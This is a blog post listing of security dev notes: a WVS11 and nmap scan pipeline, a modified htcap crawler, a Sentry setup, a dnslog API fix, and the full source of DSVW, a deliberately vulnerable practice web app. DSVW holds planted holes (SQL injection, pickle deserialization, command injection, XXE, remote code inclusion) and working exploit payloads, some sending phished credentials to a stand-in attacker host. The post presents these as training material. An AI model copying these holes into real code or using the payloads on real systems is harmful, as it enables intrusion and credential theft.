Putting together a WVS11 scan pipeline

Published: July 14, 2017 // Categories: dev notes, linux, python, windows // 10 Comments

I recently found some spare time to put together a WVS11 scanning pipeline, built mainly on nmap plus the WVS11 API. Roughly like this:

Three machines in total:
one CentOS box doing subdomain brute-forcing + port scanning + data collection,
two Windows boxes running WVS, receiving tasks and launching scans.

I introduced the WVS11 API before:
http://0cx.cc/about_awvs11_api.jspx
That post covers how to drive it and export reports as XML; the scripts that post-process the XML all live at
https://github.com/0xa-saline/acunetix-api

The subdomain brute-forcer is modified from lijiejie's subDomainsBrute, with third-party collection added, plus a preprocessing step on the IPs before port scanning: within the same /24, take the smallest and largest hosts seen and force the whole range in between into the scan.
https://github.com/0xa-saline/subDomainsBrute

Port scanning relies on nmap, invoked through python-nmap:
http://0cx.cc/solve_bug_withe-python-nmap.jspx
http://0cx.cc/some_skill_for_quen.jspx

It determines open ports and their services; whenever an http/https service shows up, it goes straight into WVS for scanning.

Some plugin checks reuse bugscan's scan scripts:
http://0cx.cc/which_cms_online.jspx

The real service scanning, though, is handled by the very elegant fenghuangscan. Dictionary loading borrows from bugscan's loader: the target domain can be split into tokens and merged into the wordlist.

Roughly these service classes are covered:

Mostly weak-password checks and weak/misconfigured service types.

The main job is pushing tasks into WVS. I saw the WiFi Master Key SRC had published some test domains, so I tested a few..
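For reference, pushing one target into WVS11 over its REST API looks roughly like this. A minimal sketch only: the host, API key and profile id are placeholders, and the /api/v1/targets and /api/v1/scans routes are the ones covered in the earlier AWVS11 API post.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# sketch: register a target in AWVS11 and start a scan against it
import json
import requests

AWVS = 'https://192.168.1.10:3443'        # hypothetical WVS box
HEADERS = {'X-Auth': 'your_api_key', 'Content-Type': 'application/json'}

def push_to_wvs(url):
    # step 1: register the target
    target = {'address': url, 'description': 'from nmap http/https results', 'criticality': '10'}
    resp = requests.post(AWVS + '/api/v1/targets', data=json.dumps(target), headers=HEADERS, verify=False)
    target_id = resp.json()['target_id']
    # step 2: start a scan on it (profile id assumed to be the stock "Full Scan" profile)
    scan = {'target_id': target_id,
            'profile_id': '11111111-1111-1111-1111-111111111111',
            'schedule': {'disable': False, 'start_date': None, 'time_sensitive': False}}
    requests.post(AWVS + '/api/v1/scans', data=json.dumps(scan), headers=HEADERS, verify=False)

push_to_wvs('http://testphp.vulnweb.com')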

Modified a crawler: htcap

Published: June 24, 2017 // Categories: dev notes, code study, python // No Comments

Switching htcap's database to MySQL

So lazy.. procrastination..... This should have been finished two months ago; a buddy's nagging finally made me rush it out. The crawler I modified is htcap, whose strength is that it is built on PhantomJS. Storage was originally sqlite3. The crawler itself is actually pretty good, so I swapped the database for MySQL and added a few features while I was at it.

Roughly the new features:

0. Stop repeated DNS resolution (cache lookups) done

1. Switch htcap's database to MySQL done

2. Filter out common analytics and share-widget domains done

3. Recognize common static file extensions done

4. URL gathering: on top of the original robots.txt parsing, add directory brute-forcing and search-engine collection, and flag directories that cannot be accessed done

5. Drop the sqlmap and Arachni scan integration. done

6. Add page fingerprinting.

7. Add exact-duplicate and similarity-based deduplication

A few of these, explained:

0x00. Stop repeated DNS resolution

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket  
import requests
_dnscache={}  
def _setDNSCache():  
    """ 
    Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. 
    """  

    def _getaddrinfo(*args, **kwargs):  
        global _dnscache  
        if args in _dnscache:  
            print str(args)+" in cache"  
            return _dnscache[args]  

        else:  
            print str(args)+" not in cache"    
            _dnscache[args] = socket._getaddrinfo(*args, **kwargs)  
            return _dnscache[args]  

    if not hasattr(socket, '_getaddrinfo'):  
        socket._getaddrinfo = socket.getaddrinfo  
        socket.getaddrinfo = _getaddrinfo  



def test(url):  
    _setDNSCache()  
    import time
    start = time.time()
    requests.get(url)
    end = time.time()
    print "first \t"+str(end-start)
    requests.get(url)
    sect = time.time()
    print "second \t"+str(sect - end)
    requests.get(url)
    print "third \t"+str(time.time() - sect)


if __name__ == '__main__':  
    url = "http://testphp.vulnweb.com"
    test(url)  

The results are fairly satisfying:

('0cx.cc', 80, 0, 1) not in cache
first   1.11360812187
('0cx.cc', 80, 0, 1) in cache
second  0.933846950531
('0cx.cc', 80, 0, 1) in cache
third   0.733961105347

But it isn't a win every single time:

('github.com', 443, 0, 1) not in cache
first   1.77086091042
('github.com', 443, 0, 1) in cache
second  2.0764131546
('github.com', 443, 0, 1) in cache
third   3.75542092323

This approach works, but it has drawbacks:
1. It only patches socket.getaddrinfo; socket.gethostbyname and socket.gethostbyname_ex still take the old path.
2. It only affects this process, whereas editing /etc/hosts affects every program, including ping.
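Drawback 1 could be papered over the same way if needed; a minimal sketch of the same monkey-patch applied to socket.gethostbyname (gethostbyname_ex would be analogous; this is my addition, not part of htcap_mysql):

import socket

_hostcache = {}
def _setHostCache():
    """Same monkey-patch idea, applied to socket.gethostbyname."""
    def _gethostbyname(host):
        if host not in _hostcache:
            _hostcache[host] = socket._gethostbyname(host)
        return _hostcache[host]

    if not hasattr(socket, '_gethostbyname'):
        socket._gethostbyname = socket.gethostbyname
        socket.gethostbyname = _gethostbyname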

0x01. Switching htcap's database to MySQL

vi core/lib/DB_config.py
    # database connection info
    'host' : 'localhost',
    'user' : 'root',
    'port' : '3306',
    'password' : 'mysqlroot',
    'db' : 'w3a_scan',

0x02. Filtering common analytics and share-widget sites

    def urlfilter(self):
        IGNORE_DOMAIN = [   # domains filtered unconditionally: the big portals plus common analytics/share services
            'taobao.com','51.la','weibo.com','qq.com','t.cn','baidu.com','gravatar.com','cnzz.com','51yes.com',
            'google-analytics.com','tanx.com','360.cn','yy.com','163.com','263.com','eqxiu.com','gnu.org','github.com',
            'facebook.com','twitter.com','google.com'
        ]

....
and so on
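The check itself is nothing special; a minimal sketch of how such a list can be applied (urlsplit-based; the real urlfilter in htcap_mysql differs in detail):

from urlparse import urlsplit

def is_ignored(url, ignore_domains):
    # match the host itself and any subdomain of an ignored domain
    host = urlsplit(url).hostname or ''
    return any(host == d or host.endswith('.' + d) for d in ignore_domains)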

Test site: testphp.vulnweb.com

Results:

1. No collection, no deduplication

. . initialized, crawl started with 10 threads
[=================================]   66 of 66 pages processed in 8 minutes
Crawl finished, 66 pages analyzed in 8 minutes


2. No collection, but with deduplication

3. With collection and deduplication

. initialized, crawl started with 10 threads
[=================================]   108 of 108 pages processed in 43 minutes
Crawl finished, 108 pages analyzed in 43 minutes

ps:
collection off vs. on: 66 vs. 108 pages
dedup off vs. on: 85 vs. 65 pages
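The dedup idea, sketched (exact dedup on the normalized URL; "similar" URLs collapse when host, path and parameter names match even though the values differ; the real implementation differs in detail):

from urlparse import urlsplit, parse_qsl

seen = set()

def is_duplicate(url):
    parts = urlsplit(url)
    # same host+path with the same parameter names counts as a duplicate
    key = (parts.netloc, parts.path, tuple(sorted(k for k, v in parse_qsl(parts.query))))
    if key in seen:
        return True
    seen.add(key)
    return False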

The only drawback is that PhantomJS is a horrendous memory hog..

https://github.com/0xa-saline/htcap_mysql

PS: since the author of PhantomJS no longer maintains it, this fork probably won't see further updates either.

Also: I won't be fixing bugs this crawler causes for you.

Setting up Sentry on docker

Published: April 13, 2017 // Categories: ops, dev notes, linux, windows, python, misc // 2 Comments

I've recently been reading Dong Weiming's Python Web Development in Practice, in which he recommends a gem called Sentry. As it happens, a friend and I had just been discussing how to record the exceptions swallowed by try/except blocks, and this fits the bill exactly.

** Intro **

Sentry's real-time error tracking gives you insight into production deployments and information to reproduce and fix crashes. --- the official site

Sentry is a platform for logging and aggregating events in real time. It focuses on error monitoring and on extracting everything needed for after-the-fact debugging. Built on Django, it helps developers dig exceptions out of log files scattered across servers. Sentry is written in Python, open source, performs well and is easy to extend; notable users include Disqus, Path, Mozilla and Pinterest. It is split into client and server: the client is embedded in your application and reports exceptions to the server, which stores them in a database and provides a web interface for browsing.

** Installation **
The official docs at https://docs.sentry.io/ describe two ways to install the server: one from Python, which felt like a hassle, so I went with the second: docker [which upstream recommends anyway].

This route requires installing ** docker ** and ** docker-compose ** first.

0x01 install docker
0x02 install docker-compose
0x03 fetch sentry
0x04 set sentry up

I already had docker and docker-compose installed locally, so straight to step 3:

git clone https://github.com/getsentry/onpremise.git

Once cloned, just follow its README.md; the whole process went fairly smoothly.

** step 1. Build the containers and create the database and sentry directories **

mkdir  -p data/{sentry,postgres}

** step 2. Generate a secret key and add it to the docker-compose file **

sudo docker-compose run --rm web config generate-secret-key

This step takes a while. Along the way it prompts you to create a superuser; the username is an email address, which will receive sentry notifications later, and the password can be anything you'll remember.

At the end it prints a jumble of characters to the terminal (something like: ** z#4zkbxk1@8r*t=9z^@+q1=66zbida&dliunh1@p–u#zv63^g ** ).
That is the secret key. Copy it into docker-compose.yml and save: uncomment SENTRY_SECRET_KEY and paste the string in, along these lines:
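In the stock onpremise docker-compose.yml this ends up as a single entry under the environment section, roughly: SENTRY_SECRET_KEY: '<the string you just generated>'.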

** step 3. Run the database migrations and create the sentry superuser **

sudo docker-compose run --rm web upgrade

Create the user here: a fresh sentry instance needs one superuser account.

** step 4. Start all the services **

sudo docker-compose up -d


And that's it: sentry is up!

In practice:

from raven import Client

# DSN from the Sentry project settings (the docker box, port 9000)
client = Client('http://f4e4bfb6d653491281340963951dde74:10d7b52849684a32850b8d9fde0168dd@127.0.0.1:9000/2')

# inside a DB helper class:
    def find_result(self, sql, arg=''):
        try:
            with self.connection.cursor() as cursor:
                if len(arg) > 0:
                    cursor.execute(sql, arg)
                else:
                    cursor.execute(sql)
                result = cursor.fetchone()
                self.connection.commit()
                return result

        except Exception, e:
            client.captureException()  # ship the exception to Sentry
            print sql, str(e)

print sql,str(e)

prints the error locally, while

client.captureException()

is what records the error log in Sentry.

A small vulnerable playground

Published: December 24, 2016 // Categories: work log, code study, python // 2 Comments

I've been testing some things lately and needed a practice target along the lines of xvwa or dvws. Unexpectedly found a Python one that covers most of the need, and above all it's lightweight.

The whole thing is very little code: under 100 lines [99, to be exact].

#!/usr/bin/env python
import BaseHTTPServer, cgi, cStringIO, httplib, json, os, pickle, random, re, socket, SocketServer, sqlite3, string, sys, subprocess, time, traceback, urllib, xml.etree.ElementTree
try:
    import lxml.etree
except ImportError:
    print "[!] please install 'python-lxml' to (also) get access to XML vulnerabilities (e.g. '%s')\n" % ("apt-get install python-lxml" if not subprocess.mswindows else "https://pypi.python.org/pypi/lxml")

NAME, VERSION, GITHUB, AUTHOR, LICENSE = "Damn Small Vulnerable Web (DSVW) < 100 LoC (Lines of Code)", "0.1m", "https://github.com/stamparm/DSVW", "Miroslav Stampar (@stamparm)", "Public domain (FREE)"
LISTEN_ADDRESS, LISTEN_PORT = "127.0.0.1", 65412
HTML_PREFIX, HTML_POSTFIX = "<!DOCTYPE html>\n<html>\n<head>\n<style>a {font-weight: bold; text-decoration: none; visited: blue; color: blue;} ul {display: inline-block;} .disabled {text-decoration: line-through; color: gray} .disabled a {visited: gray; color: gray; pointer-events: none; cursor: default} table {border-collapse: collapse; margin: 12px; border: 2px solid black} th, td {border: 1px solid black; padding: 3px} span {font-size: larger; font-weight: bold}</style>\n<title>%s</title>\n</head>\n<body style='font: 12px monospace'>\n<script>function process(data) {alert(\"Surname(s) from JSON results: \" + Object.keys(data).map(function(k) {return data[k]}));}; var index=document.location.hash.indexOf('lang='); if (index != -1) document.write('<div style=\"position: absolute; top: 5px; right: 5px;\">Chosen language: <b>' + decodeURIComponent(document.location.hash.substring(index + 5)) + '</b></div>');</script>\n" % cgi.escape(NAME), "<div style=\"position: fixed; bottom: 5px; text-align: center; width: 100%%;\">Powered by <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">%s</a> (v<b>%s</b>)</div>\n</body>\n</html>" % (GITHUB, re.search(r"\(([^)]+)", NAME).group(1), VERSION)
USERS_XML = """<?xml version="1.0" encoding="utf-8"?><users><user id="0"><username>admin</username><name>admin</name><surname>admin</surname><password>7en8aiDoh!</password></user><user id="1"><username>dricci</username><name>dian</name><surname>ricci</surname><password>12345</password></user><user id="2"><username>amason</username><name>anthony</name><surname>mason</surname><password>gandalf</password></user><user id="3"><username>svargas</username><name>sandra</name><surname>vargas</surname><password>phest1945</password></user></users>"""
CASES = (("Blind SQL Injection (<i>boolean</i>)", "?id=2", "/?id=2%20AND%20SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C1%2C1)%3D%277%27\" onclick=\"alert('checking if the first character for admin\\'s password is digit \\'7\\' (true in case of same result(s) as for \\'vulnerable\\')')", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Boolean_Exploitation_Technique"), ("Blind SQL Injection (<i>time</i>)", "?id=2", "/?id=(SELECT%20(CASE%20WHEN%20(SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C2%2C1)%3D%27e%27)%20THEN%20(LIKE(%27ABCDEFG%27%2CUPPER(HEX(RANDOMBLOB(300000000)))))%20ELSE%200%20END))\" onclick=\"alert('checking if the second character for admin\\'s password is letter \\'e\\' (true in case of delayed response)')", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Time_delay_Exploitation_technique"), ("UNION SQL Injection", "?id=2", "/?id=2%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20(SELECT%20id%7C%7C%27%2C%27%7C%7Cusername%7C%7C%27%2C%27%7C%7Cpassword%20FROM%20users%20WHERE%20username%3D%27admin%27)", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Union_Exploitation_Technique"), ("Login Bypass", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%20OR%20%271%27%20LIKE%20%271", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29"), ("HTTP Parameter Pollution", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%2F*&amp;password=*%2FOR%2F*&amp;password=*%2F%271%27%2F*&amp;password=*%2FLIKE%2F*&amp;password=*%2F%271", "https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_%28OTG-INPVAL-004%29"), ("Cross Site Scripting (<i>reflected</i>)", "/?v=0.2", "/?v=0.2%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_%28OTG-INPVAL-001%29"), ("Cross Site Scripting (<i>stored</i>)", "/?comment=\" onclick=\"document.location='/?comment='+prompt('please leave a comment'); return false", "/?comment=%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_%28OTG-INPVAL-002%29"), ("Cross Site Scripting (<i>DOM</i>)", "/?#lang=en", "/?foobar#lang=en%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_%28OTG-CLIENT-001%29"), ("Cross Site Scripting (<i>JSONP</i>)", "/users.json?callback=process\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=process';document.getElementsByTagName('head')[0].appendChild(script);return false", "/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess';document.getElementsByTagName('head')[0].appendChild(script);return false", "http://www.metaltoad.com/blog/using-jsonp-safely"), ("XML External Entity (<i>local</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E" if not subprocess.mswindows else "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2FC%3A%2FWindows%2Fwin.ini%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", 
"https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OTG-INPVAL-008%29"), ("XML External Entity (<i>remote</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2Fpastebin.com%2Fraw.php%3Fi%3Dh1rvVnvx%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OTG-INPVAL-008%29"), ("Server Side Request Forgery", "/?path=", "/?path=http%3A%2F%2F127.0.0.1%3A631" if not subprocess.mswindows else "/?path=%5C%5C127.0.0.1%5CC%24%5CWindows%5Cwin.ini", "http://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/"), ("Blind XPath Injection (<i>boolean</i>)", "/?name=dian", "/?name=admin%27%20and%20substring(password%2Ftext()%2C3%2C1)%3D%27n\" onclick=\"alert('checking if the third character for admin\\'s password is letter \\'n\\' (true in case of found item)')", "https://www.owasp.org/index.php/XPATH_Injection"), ("Cross Site Request Forgery", "/?comment=", "/?v=%3Cimg%20src%3D%22%2F%3Fcomment%3D%253Cdiv%2520style%253D%2522color%253Ared%253B%2520font-weight%253A%2520bold%2522%253EI%2520quit%2520the%2520job%253C%252Fdiv%253E%22%3E\" onclick=\"alert('please visit \\'vulnerable\\' page to see what this click has caused')", "https://www.owasp.org/index.php/Testing_for_CSRF_%28OTG-SESS-005%29"), ("Frame Injection (<i>phishing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fattacker.co.nf%2Fi%2Flogin.html%22%20style%3D%22background-color%3Awhite%3Bz-index%3A10%3Btop%3A10%25%3Bleft%3A10%25%3Bposition%3Afixed%3Bborder-collapse%3Acollapse%3Bborder%3A1px%20solid%20%23a8a8a8%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Frame Injection (<i>content spoofing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fattacker.co.nf%2F%22%20style%3D%22background-color%3Awhite%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Clickjacking", None, "/?v=0.2%3Cdiv%20style%3D%22opacity%3A0%3Bfilter%3Aalpha(opacity%3D20)%3Bbackground-color%3A%23000%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20onclick%3D%22document.location%3D%27http%3A%2F%2Fattacker.co.nf%2F%27%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert(%22click%20anywhere%20on%20page%22)%3B%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Clickjacking_%28OTG-CLIENT-009%29"), ("Unvalidated Redirect", "/?redir=", "/?redir=http%3A%2F%2Fattacker.co.nf", "https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet"), ("Arbitrary Code Execution", "/?domain=www.google.com", "/?domain=www.google.com%3B%20ifconfig" if not subprocess.mswindows else "/?domain=www.google.com%26%20ipconfig", "https://en.wikipedia.org/wiki/Arbitrary_code_execution"), ("Full Path Disclosure", "/?path=", "/?path=foobar", "https://www.owasp.org/index.php/Full_Path_Disclosure"), ("Source Code Disclosure", "/?path=", "/?path=dsvw.py", "https://www.imperva.com/resources/glossary?term=source_code_disclosure"), ("Path Traversal", "/?path=", "/?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" if not subprocess.mswindows else "/?path=..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini", "https://www.owasp.org/index.php/Path_Traversal"), ("File Inclusion (<i>remote</i>)", "/?include=", "/?include=http%%3A%%2F%%2Fpastebin.com%%2Fraw.php%%3Fi%%3DN5ccE6iH&amp;cmd=%s" % ("ifconfig" if not 
subprocess.mswindows else "ipconfig"), "https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion"), ("HTTP Header Injection (<i>phishing</i>)", "/?charset=utf8", "/?charset=utf8%0D%0AX-XSS-Protection:0%0D%0AContent-Length:388%0D%0A%0D%0A%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ELogin%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody%20style%3D%27font%3A%2012px%20monospace%27%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.co.nf%2Fi%2Flog.php%22%20onSubmit%3D%22alert(%27visit%20%5C%27http%3A%2F%2Fattacker.co.nf%2Fi%2Flog.txt%5C%27%20to%20see%20your%20phished%20credentials%27)%22%3EUsername%3A%3Cbr%3E%3Cinput%20type%3D%22text%22%20name%3D%22username%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E", "https://www.rapid7.com/db/vulnerabilities/http-generic-script-header-injection"), ("Component with Known Vulnerability (<i>pickle</i>)", "/?object=%s" % urllib.quote(pickle.dumps(dict((_.findtext("username"), (_.findtext("name"), _.findtext("surname"))) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))), "/?object=cos%%0Asystem%%0A(S%%27%s%%27%%0AtR.%%0A\" onclick=\"alert('checking if arbitrary code can be executed remotely (true in case of delayed response)')" % urllib.quote("ping -c 5 127.0.0.1" if not subprocess.mswindows else "ping -n 5 127.0.0.1"), "https://www.cs.uic.edu/~s/musings/pickle.html"), ("Denial of Service (<i>memory</i>)", "/?size=32", "/?size=9999999", "https://www.owasp.org/index.php/Denial_of_Service"))

def init():
    global connection
    BaseHTTPServer.HTTPServer.allow_reuse_address = True
    connection = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
    cursor = connection.cursor()
    cursor.execute("CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, name TEXT, surname TEXT, password TEXT)")
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")

class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
        code, content, params, cursor = httplib.OK, HTML_PREFIX, dict((match.group("parameter"), urllib.unquote(','.join(re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"]))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.urlopen(params["path"])).read()
                elif "domain" in params:
                    content = subprocess.check_output("nslookup " + params["domain"], shell=True, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(cStringIO.StringIO(params["xml"]), lxml.etree.XMLParser(no_network=False)), pretty_print=True)
                elif "name" in params:
                    found = lxml.etree.parse(cStringIO.StringIO(USERS_XML)).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:
                    backup, sys.stdout, program, envs = sys.stdout, cStringIO.StringIO(), (open(params["include"], "rb") if not "://" in params["include"] else urllib.urlopen(params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
                    exec(program) in envs
                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")
            elif path == "/login":
                cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]", "", params.get("username", "")) + "' AND password='" + params.get("password", "") + "'")
                content += "Welcome <b>%s</b><meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=%s; path=/\"><meta http-equiv=\"refresh\" content=\"1; url=/\"/>" % (re.sub(r"[^\w]", "", params.get("username", "")), "".join(random.sample(string.letters + string.digits, 20))) if cursor.fetchall() else "The username and/or password is incorrect<meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\">"
            else:
                code = httplib.NOT_FOUND
        except Exception, ex:
            content = ex.output if isinstance(ex, subprocess.CalledProcessError) else traceback.format_exc()
            code = httplib.INTERNAL_SERVER_ERROR
        finally:
            self.send_response(code)
            self.send_header("Connection", "close")
            self.send_header("X-XSS-Protection", "0")
            self.send_header("Content-Type", "%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % params.get("charset", "utf8")))
            self.end_headers()
            self.wfile.write("%s%s" % (content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else ""))
            self.wfile.flush()
            self.wfile.close()

class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
    def server_bind(self):
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        BaseHTTPServer.HTTPServer.server_bind(self)

if __name__ == "__main__":
    init()
    print "%s #v%s\n by: %s\n\n[i] running HTTP server at '%s:%d'..." % (NAME, VERSION, AUTHOR, LISTEN_ADDRESS, LISTEN_PORT)
    try:
        ThreadingServer((LISTEN_ADDRESS, LISTEN_PORT), ReqHandler).serve_forever()
    except KeyboardInterrupt:
        pass
    except Exception, ex:
        print "[x] exception occurred ('%s')" % ex
    finally:
        os._exit(0)

Project: https://github.com/stamparm/DSVW
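Running the file starts a threaded HTTP server on 127.0.0.1:65412 (see LISTEN_ADDRESS/LISTEN_PORT above). A quick smoke test with requests, as a sketch:

import requests

r = requests.get('http://127.0.0.1:65412/')
print r.status_code          # 200
print 'Attacks:' in r.text   # the index page lists every vulnerable case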

Reworking the dnslog API into the output we actually need

Published: December 13, 2016 // Categories: dev notes, linux, python, windows, misc // No Comments

There used to be cloudeye, whose API was friendly beyond belief; later I tried ceye.io for a while, but ceye.io just isn't stable. So I turned to dnslog. Its being open source is genuinely convenient, but its API is painful as hell.
Say we have a whoami token.

Querying it through the API:

http://webadmin.secevery.com/api/web/www/whoami/

returns false. Comparing carefully against its api function, it turns out to be:

def api(request, logtype, udomain, hashstr):
    apistatus = False
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'dns':
        res = DNSLog.objects.filter(host__contains=host)
        if len(res) > 0:
            apistatus = True
    elif logtype == 'web':
        res = WebLog.objects.filter(path__contains=host)
        if len(res) > 0:
            apistatus = True
    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': apistatus})


host = "%s.%s." % (hashstr, udomain) is the culprit.
